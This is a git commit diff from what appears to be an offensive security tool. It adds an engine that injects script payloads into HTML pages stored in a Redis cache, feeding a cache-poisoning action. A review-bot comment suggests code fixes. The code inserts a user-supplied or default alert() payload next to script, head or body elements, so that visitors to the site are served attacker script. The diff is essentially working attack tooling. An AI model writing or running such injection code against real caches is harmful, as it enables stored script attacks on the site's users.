add: improved script injection engine for redis cache

This commit is contained in:
cr0hn
2016-02-26 13:04:23 +01:00
parent cd00730c0b
commit ad4e1ef1b0


@@ -79,35 +79,27 @@ def handle_html(config, content):
results = None results = None
# --------------------------------------------------------------------------
# Search insertion points # Search insertion points
for point in ("head", "title", "body", "script", "div", "p"): # --------------------------------------------------------------------------
insert_point = doc_root.find(".//%s" % point)
if insert_point is None: # Try to find end of script entries
continue insert_point = doc_root.find(".//script[last()]")
# -------------------------------------------------------------------------- if insert_point is not None:
# Add the injection Payload results = add_injection(config, doc_root, insert_point, where="before")
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
elif config.poison_payload: else:
payload = etree.fromstring(config.poison_payload) # Try to find othe entry
else: for point in ("head", "title", "body", "div", "p"):
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>") insert_point = doc_root.find(".//%s" % point)
insert_point.addnext(payload) if insert_point is None:
continue
# Set results results = add_injection(config, doc_root, insert_point)
tmp_results = etree.tostring(doc_root, method="html", pretty_print=True, encoding=doc_root.docinfo.encoding)
# Codding filters break
results = tmp_results.decode(errors="replace").replace("\\u000a", "\n")
break
# -------------------------------------------------------------------------- # --------------------------------------------------------------------------
# Build results # Build results
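Review bot: The `where="before"` passed in the `script[last()]` branch is never honored, because add_injection (defined in the next hunk, whose body continues past this view) ends with an unconditional `insert_point.addnext(payload)`, so both branches insert after the located element and the documented after|before contract is a no-op. Either honor it, `insert = insert_point.addprevious if where == "before" else insert_point.addnext` followed by `insert(payload)`, and raise a ValueError for any other value, or drop the parameter and its docstring. Separately, the payload file is still opened with mode `"rU"`, which Python 3 deprecated in 3.4 and removed in 3.11; `open(config.poison_payload_file, "r")` behaves the same on the versions this code targets. The docstring typo `posible` and the comment `Try to find othe entry` could be fixed in the same pass.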
@@ -115,6 +107,38 @@ def handle_html(config, content):
return results return results
# ----------------------------------------------------------------------
def add_injection(config, doc_root, insert_point, where="after"):
"""
:param where: posible values: after|before
:type where: str
"""
# --------------------------------------------------------------------------
# Add the injection Payload
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
elif config.poison_payload:
payload = etree.fromstring(config.poison_payload)
else:
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>")
insert_point.addnext(payload)
# Set results
tmp_results = etree.tostring(doc_root, method="html", pretty_print=True, encoding=doc_root.docinfo.encoding)
# Codding filters
results = tmp_results.decode(errors="replace").replace("\\u000a", "\n")
return results
# ---------------------------------------------------------------------- # ----------------------------------------------------------------------
def action_redis_cache_poison(config): def action_redis_cache_poison(config):
""" """